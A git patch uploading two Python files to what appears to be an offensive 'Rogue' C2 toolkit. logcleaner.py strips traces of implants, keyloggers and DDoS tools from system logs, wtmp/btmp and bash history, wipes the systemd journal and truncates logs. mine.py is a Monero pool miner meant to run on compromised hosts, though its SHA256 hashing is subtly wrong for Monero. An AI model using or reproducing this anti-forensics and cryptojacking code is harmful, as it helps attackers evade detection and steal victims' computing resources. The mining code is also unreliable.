From 6e818cd0768a7850f98f22edec87be8bcaa6f32e Mon Sep 17 00:00:00 2001 From: ek0ms savi0r Date: Sun, 31 May 2026 04:12:47 +0000 Subject: [PATCH] Upload files to "/" --- logcleaner.py | 295 ++++++++++++++++++++++++++++++++++++++++++++++++++ mine.py | 96 ++++++++++++++++ 2 files changed, 391 insertions(+) create mode 100644 logcleaner.py create mode 100644 mine.py diff --git a/logcleaner.py b/logcleaner.py new file mode 100644 index 0000000..10c5e2b --- /dev/null +++ b/logcleaner.py @@ -0,0 +1,295 @@ +#!/usr/bin/env python3 +""" +PAYLOAD: Log Cleaner +DESCRIPTION: Removes forensic traces from system logs +AUTHOR: Rogue Red Team +VERSION: 2.0 +SECURITY: This tool modifies system logs - Use only on authorized systems +""" +import os, sys, re, subprocess, datetime, json, hashlib + +class LogCleaner: + def __init__(self, implant_id=None): + self.implant_id = implant_id or self.get_implant_id() + self.log_patterns = [ + r'rogue_implant', + r'rogue_agent', + r'systemd-journald.*python', + r'python3.*\.cache/\.rogue', + r'polyloader', + r'ddos\.py', + r'mine\.py', + r'keylogger', + r'screenshot', + self.implant_id + ] + + # System log files to clean + self.log_files = { + 'linux': [ + '/var/log/auth.log', + '/var/log/syslog', + '/var/log/messages', + '/var/log/secure', + '/var/log/kern.log', + '/var/log/dmesg', + '/var/log/boot.log', + '/var/log/cron', + '/var/log/maillog', + '/var/log/spooler', + '/var/log/lastlog', + '/var/log/wtmp', + '/var/log/btmp', + '/var/log/utmp', + '/var/log/faillog' + ], + 'bash_history': [ + os.path.expanduser('~/.bash_history'), + '/root/.bash_history' + ], + 'application_logs': [ + os.path.expanduser('~/.cache/.rogue/.implant.log') + ] + } + + def get_implant_id(self): + """Generate implant identifier for pattern matching""" + import socket, getpass + hostname = socket.gethostname() + username = getpass.getuser() + return hashlib.md5(f"{hostname}_{username}".encode()).hexdigest()[:8] + + def clean_file(self, filepath): + """Remove matching lines from a file""" + if not os.path.exists(filepath): + return {"file": filepath, "status": "not_found"} + + try: + with open(filepath, 'r') as f: + lines = f.readlines() + + original_count = len(lines) + + # Filter out lines matching any pattern + new_lines = [] + for line in lines: + if not any(re.search(pattern, line, re.IGNORECASE) for pattern in self.log_patterns): + new_lines.append(line) + + removed_count = original_count - len(new_lines) + + if removed_count > 0: + # Backup original file + backup_path = f"{filepath}.rogue_backup" + if not os.path.exists(backup_path): + with open(backup_path, 'w') as f: + f.writelines(lines) + + # Write cleaned file + with open(filepath, 'w') as f: + f.writelines(new_lines) + + return { + "file": filepath, + "status": "cleaned", + "removed": removed_count, + "backup": backup_path + } + else: + return { + "file": filepath, + "status": "no_matches", + "removed": 0 + } + + except Exception as e: + return { + "file": filepath, + "status": "error", + "error": str(e) + } + + def clean_bash_history(self): + """Clean bash history files""" + results = [] + + for history_file in self.log_files['bash_history']: + if os.path.exists(history_file): + result = self.clean_file(history_file) + results.append(result) + + # Also clear current session history + if history_file == os.path.expanduser('~/.bash_history'): + subprocess.call('history -c', shell=True) + subprocess.call('history -w', shell=True) + + return results + + def clean_system_logs(self): + """Clean system log files""" + results = [] + + for log_file in self.log_files['linux']: + result = self.clean_file(log_file) + results.append(result) + + return results + + def clean_application_logs(self): + """Clean application-specific logs""" + results = [] + + for log_file in self.log_files['application_logs']: + result = self.clean_file(log_file) + results.append(result) + + return results + + def clear_memory_logs(self): + """Clear log-related memory""" + results = [] + + try: + # Clear systemd journal + if os.path.exists('/bin/journalctl'): + subprocess.call('journalctl --vacuum-time=1s 2>/dev/null', shell=True) + subprocess.call('journalctl --rotate 2>/dev/null', shell=True) + results.append({ + "action": "systemd_journal_clear", + "status": "success" + }) + + # Clear dmesg + subprocess.call('dmesg -c 2>/dev/null', shell=True) + results.append({ + "action": "dmesg_clear", + "status": "success" + }) + + except Exception as e: + results.append({ + "action": "memory_logs_clear", + "status": "error", + "error": str(e) + }) + + return results + + def execute(self, clean_level="aggressive"): + """Execute log cleaning based on level""" + results = { + "timestamp": datetime.datetime.now().isoformat(), + "clean_level": clean_level, + "operations": [] + } + + try: + print("[+] Starting log cleaning operations...") + + # Always clean application logs + print("[+] Cleaning application logs...") + app_results = self.clean_application_logs() + results["operations"].extend(app_results) + + # Clean bash history + print("[+] Cleaning bash history...") + bash_results = self.clean_bash_history() + results["operations"].extend(bash_results) + + if clean_level in ["moderate", "aggressive"]: + print("[+] Cleaning system logs...") + sys_results = self.clean_system_logs() + results["operations"].extend(sys_results) + + if clean_level == "aggressive": + print("[+] Clearing memory logs...") + mem_results = self.clear_memory_logs() + results["operations"].extend(mem_results) + + # Additional aggressive measures + print("[+] Performing aggressive cleanup...") + aggressive_results = self.aggressive_cleanup() + results["operations"].extend(aggressive_results) + + # Generate summary + total_cleaned = sum(op.get("removed", 0) for op in results["operations"] if isinstance(op, dict)) + total_errors = sum(1 for op in results["operations"] if isinstance(op, dict) and op.get("status") == "error") + + results["summary"] = { + "total_operations": len(results["operations"]), + "total_lines_removed": total_cleaned, + "total_errors": total_errors + } + + print(f"[+] Log cleaning complete. Removed {total_cleaned} lines across {len(results['operations'])} files.") + + # Save results + output_dir = os.path.expanduser("~/.cache/.rogue/cleanup") + os.makedirs(output_dir, exist_ok=True) + + output_file = os.path.join(output_dir, f"logclean_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json") + with open(output_file, 'w') as f: + json.dump(results, f, indent=2, default=str) + + return json.dumps(results["summary"], indent=2) + + except Exception as e: + return f"[!] Log cleaning failed: {str(e)}" + + def aggressive_cleanup(self): + """Additional aggressive cleanup measures""" + results = [] + + try: + # Overwrite log files with null data + for log_file in self.log_files['linux']: + if os.path.exists(log_file): + try: + # Truncate file + open(log_file, 'w').close() + results.append({ + "file": log_file, + "action": "truncated", + "status": "success" + }) + except: + pass + + # Remove backup files + import glob + backup_files = glob.glob("/var/log/*.rogue_backup") + glob.glob("~/.cache/.rogue/*.backup") + for backup in backup_files: + try: + os.remove(backup) + results.append({ + "file": backup, + "action": "backup_removed", + "status": "success" + }) + except: + pass + + except Exception as e: + results.append({ + "action": "aggressive_cleanup", + "status": "error", + "error": str(e) + }) + + return results + +def rogue_integration(): + """Wrapper for Rogue C2 integration""" + import argparse + + parser = argparse.ArgumentParser(description='Rogue Log Cleaner') + parser.add_argument('--level', choices=['light', 'moderate', 'aggressive'], + default='moderate', help='Cleaning intensity level') + + args, unknown = parser.parse_known_args() + + cleaner = LogCleaner() + return cleaner.execute(clean_level=args.level) + +if __name__ == "__main__": + print(rogue_integration()) diff --git a/mine.py b/mine.py new file mode 100644 index 0000000..32c035b --- /dev/null +++ b/mine.py @@ -0,0 +1,96 @@ +#!/usr/bin/env python3 +import threading, socket, json, time, os, base64 +import hashlib, random + +WALLET = "YOUR_MONERO_WALLET_ADDRESS" +POOL = "pool.supportxmr.com" +PORT = 3333 +THREADS = 2 +THROTTLE = 0.1 # Delay per hash, lower = more aggressive + +def get_job(sock): + while True: + try: + data = sock.recv(4096).decode() + for line in data.strip().split("\n"): + if "job" in line: + return json.loads(line) + except Exception as e: + print(f"[!] Error receiving job: {e}") + time.sleep(5) + +def submit_share(sock, job_id, nonce, result): + sub = { + "id": "0", + "method": "submit", + "params": { + "id": "worker", + "job_id": job_id, + "nonce": nonce, + "result": result + } + } + try: + sock.send((json.dumps(sub) + "\n").encode()) + except: + pass # Ignore broken pipe or timeout + +def connect_stratum(): + s = socket.socket() + s.connect((POOL, PORT)) + login = { + "id": "0", + "method": "login", + "params": { + "login": WALLET, + "pass": "x", + "agent": "RogueMiner/1.0" + } + } + s.send((json.dumps(login) + "\n").encode()) + return s + +def mine_loop(): + while True: + try: + sock = connect_stratum() + job_data = get_job(sock) + job = job_data['result']['job'] + blob = job['blob'] + job_id = job['job_id'] + target = int(job['target'], 16) + + print(f"[+] New job received. Starting mining thread.") + hashes = 0 + + while True: + nonce = format(random.randint(0, 99999999), '08x') + base = blob[:78] + nonce + blob[86:] + hash_result = hashlib.sha256(bytes.fromhex(base)).hexdigest() + hashes += 1 + + if int(hash_result, 16) < target: + print(f"[✓] Share accepted: {hash_result[:16]}") + submit_share(sock, job_id, nonce, hash_result) + break # get new job after submission + + time.sleep(THROTTLE) + + except Exception as e: + print(f"[!] Miner thread error: {e}") + time.sleep(10) # reconnect delay + +if __name__ == "__main__": + print("👑 RogueMiner: Continuous Mining Enabled") + threads = [] + for i in range(THREADS): + t = threading.Thread(target=mine_loop) + t.daemon = True + t.start() + threads.append(t) + + try: + while True: + time.sleep(5) + except KeyboardInterrupt: + print("\n[!] Mining interrupted by user.")